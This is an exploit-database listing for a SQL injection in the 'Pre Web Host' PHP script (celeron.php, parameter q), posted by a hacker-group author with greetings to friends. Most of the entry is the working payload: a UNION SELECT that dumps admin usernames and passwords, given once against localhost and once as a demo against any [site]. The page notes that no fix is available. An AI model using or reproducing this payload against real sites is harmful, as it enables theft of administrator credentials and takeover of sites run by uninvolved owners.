Pre Web Host (celeron.php q) SQL Injection Vulnerability

2010-06-08 10:02:37

# EDB-ID: 1310
# CVE: ()
# OSVDB-ID: ()
# Author: Mr.Benladen
# Published: 2010-06-07
# Verified: No
# Download: Exploit Code
# Download: N/A

[~]######################################### InformatioN
#############################################[~]

[~] Title : Pre Web Host sql inj3ction Vulnerability
[~] Author : Mr.Benladen
[~] Homepage : http://www.joomlaservice.info Or http://www.dz4all.com
[~] Vendor : http://www.hostfriendz.com/detail.php?spid=54
[~] : 30$
[~] Email : [email protected]
[~] Dork : allinurl: In YoUr Dream


[~]#########################################??? ExploiT??
#############################################[~]

[~] For Exemple :

SQL iS hERE http://127.0.0.1/celeron.php?q=4sQL


http://127.0.0.1/celeron.php?q=-4+union+select+1,2,concat(username,0x3e,pass)+from+admin--


demo:
http://[site]/celeron.php?q=-4+union+select+1,2,concat%28username,0x3e,pass%29+from+admin--

[~]######################################### ThankS To
############################################[~]

[~] Special Thanks To My Best FriendS :

Federal7 khallidmoro,dr.prorat,blackroot,Ra3ch,Zioon From ukarnia- and all
Morocan hackerz

Big Gr33tz to anti tr4ck3r from www.sec-royal.com

[~] Morocan h4ckerz

[~]######################################### FinisH :D
##############################

Fixes

No fixes

In order to submit a new fix you need to be registered.